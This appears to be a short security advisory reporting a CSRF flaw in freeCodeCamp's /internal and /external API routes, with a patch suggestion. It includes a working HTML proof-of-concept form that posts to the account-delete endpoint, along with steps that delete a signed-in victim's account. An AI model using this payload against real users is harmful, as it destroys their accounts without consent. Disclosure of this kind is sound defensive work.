CSRF vulnerability in the /internal and /external routes

Impact

CSRF vulnerability in the /internal and /external routes.

POC

Use the below code and save it as poc.html:

```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://api.freecodecamp.org/internal/account/delete" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

1. Sign in to freeCodeCamp.org
2. Open the saved page and click on the Submit button.
3. Your account should now have been deleted.
Patches
The problem needs to be patched by removing these routes, and validating the requests instead.
Workarounds
References